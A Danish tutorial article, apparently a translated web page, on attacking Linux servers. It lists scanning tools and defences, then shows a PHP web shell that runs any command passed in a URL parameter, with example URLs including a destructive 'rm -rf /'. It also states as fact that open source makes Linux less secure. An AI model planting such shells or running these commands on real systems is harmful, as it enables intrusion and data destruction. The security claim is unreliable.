Hacking Linux OS: Hacking med Ubuntu (Kommandovejledning)

Linux er det mest udbredte serveroperativsystem, isรฆr til webservere. Det er open source; det betyder, at alle kan fรฅ adgang til kildekoden. Dette gรธr det mindre sikkert sammenlignet med andre operativsystemer, da angribere kan studere kildekoden for at finde sรฅrbarheder. Linux for Hackers handler om at udnytte disse sรฅrbarheder til at fรฅ uautoriseret adgang til et system.

I denne artikel vil vi introducere dig til, hvad Linux er, dets sikkerhedssรฅrbarheder, hacking med Ubuntu og de modforanstaltninger, du kan sรฆtte ind.

Hurtig note om Linux

Linux er et open source-operativsystem. Der er mange distributioner af Linux-baserede operativsystemer sรฅsom Redhat, Fedora og Ubuntu, osv. I modsรฆtning til andre operativsystemer er Linux mindre sikkert, nรฅr det kommer til sikkerhed. Det skyldes, at kildekoden er frit tilgรฆngelig, sรฅ det er nemt at studere den for sรฅrbarheder og udnytte dem sammenlignet med andre operativsystemer, der ikke er open source. Linux kan bruges som server-, desktop-, tablet- eller mobilenhedsoperativsystem.

Linux-programmer kan betjenes ved hjรฆlp af enten GUI eller kommandoer. Linux-kommandoer til Kali Linux hacking er mere effektive og effektive sammenlignet med at bruge GUI. Af denne grund hjรฆlper det at kende grundlรฆggende Linux-kommandoer til hacking.

Se disse tutorials https://www.guru99.com/unix-linux-tutorial.html om hvordan man kommer i gang med Kali Linux hacks.

Linux hacking vรฆrktรธjer

  • Nessusโ€“ dette vรฆrktรธj kan bruges til Ubuntu hack, scanningskonfigurationsindstillinger, patches og netvรฆrk osv. kan findes pรฅ https://www.tenable.com/products/nessus
  • NMap. Dette vรฆrktรธj kan bruges til at overvรฅge vรฆrter, der kรธrer pรฅ serveren, og de tjenester, de bruger. Den kan ogsรฅ bruges til at scanne efter porte. Den kan findes pรฅ https://nmap.org/
  • SARA โ€“ SARA er forkortelsen for Security Auditor's Research Assistant. Som navnet antyder, kan dette vรฆrktรธj bruges til at auditere netvรฆrk mod trusler som f.eks SQL Injection, XSS etc. kan findes pรฅ http://www-arc.com/sara/sara.html

Ovenstรฅende liste er ikke udtรธmmende; det giver dig en idรฉ om de vรฆrktรธjer, der er tilgรฆngelige for Ubuntu hacking og hacking af Linux-systemer.

Sรฅdan forhindrer du Linux-hack

Linux Hacking udnytter sรฅrbarhederne i operativsystemet. En organisation kan vedtage fรธlgende politik for at beskytte sig selv mod sรฅdanne angreb.

  • Patch managementโ€“ patches lรธser fejl, som angribere udnytter til at kompromittere et system. En god patch management politik vil sikre, at du konstant anvender relevante patches til dit system.
  • Korrekt OS-konfigurationโ€“ andre udnyttelser udnytter svaghederne i serverens konfiguration. Inaktive brugernavne og dรฆmoner bรธr deaktiveres. Standardindstillinger sรฅsom almindelige adgangskoder til applikationen, standardbrugernavne og nogle portnumre bรธr รฆndres.
  • System til pรฅvisning af indtrรฆngenโ€“ sรฅdanne vรฆrktรธjer kan bruges til at opdage uautoriseret adgang til systemet. Nogle vรฆrktรธjer har evnen til at opdage og forhindre sรฅdanne angreb.

Hackingaktivitet: Hack a Ubuntu Linux-system ved hjรฆlp af PHP

I dette praktiske scenarie lรฆrer vi, hvordan man hacker med Ubuntu og vi vil give dig grundlรฆggende oplysninger om, hvordan du kan bruge PHP at kompromittere en Linux. Vi vil ikke sigte mod et offer. Hvis du vil prรธve det, kan du installere LAMPP pรฅ din lokale maskine.

PHP kommer med to funktioner, der kan bruges til at udfรธre Linux-hacking-kommandoer. Den har funktionerne exec() og shell_exec(). Funktionen exec() returnerer den sidste linje af kommandoens output, mens shell_exec() returnerer hele resultatet af kommandoen som en streng.

Til demonstrationsformรฅl, lad os antage, at angriberadministratorerne uploader fรธlgende fil pรฅ en webserver.

<?php

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';

echo "executing shell command:-> $cmd</br>";

$output = shell_exec($cmd);

echo "<pre>$output</pre>";

?>

HER,

Ovenstรฅende script henter kommandoen fra GET-variablen ved navn cmd. Kommandoen udfรธres ved hjรฆlp af shell_exec() og resultaterne returneres i browseren.

Ovenstรฅende kode kan udnyttes ved hjรฆlp af fรธlgende URL

http://localhost/cp/konsole.php?cmd=ls%20-l

HER,

  • "...konsole.php?cmd=ls%20-l"tildeler vรฆrdien ls โ€“l til variablen cmd.

Kommandoen i Ubuntu for hacking mod serveren vil blive udfรธrt som

shell_exec('ls -l') ;

Udfรธrelse af ovenstรฅende kode pรฅ en webserver giver resultater svarende til fรธlgende.

Hack a Ubuntu Linux-system ved hjรฆlp af PHP

Ovenstรฅende kommando viser blot filerne i den aktuelle mappe og tilladelserne

Lad os antage, at angriberen sender fรธlgende kommando

rm -rf /

HER,

  • "rm" fjerner filerne
  • "rf" fรฅr rm-kommandoen til at kรธre i en rekursiv tilstand. Sletning af alle mapper og filer
  • "/" instruerer kommandoen til at begynde at slette filer fra rodmappen

Angrebet URL ville se nogenlunde sรฅdan ud

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Resumรฉ

  • Linux er et populรฆrt styresystem til servere, desktops, tablets og mobile enheder.
  • Linux er open source, og kildekoden kan fรฅs af alle. Dette gรธr det nemt at spotte sรฅrbarhederne. Det er et af de bedste OS for hackere.
  • Grundlรฆggende og netvรฆrkshacking-kommandoer ind Ubuntu er vรฆrdifulde for Linux-hackere.
  • Sรฅrbarheder er en svaghed, der kan udnyttes til at kompromittere et system.
  • En god sikkerhed kan hjรฆlpe med at beskytte et system mod at blive kompromitteret af en hacker.

Opsummer dette indlรฆg med: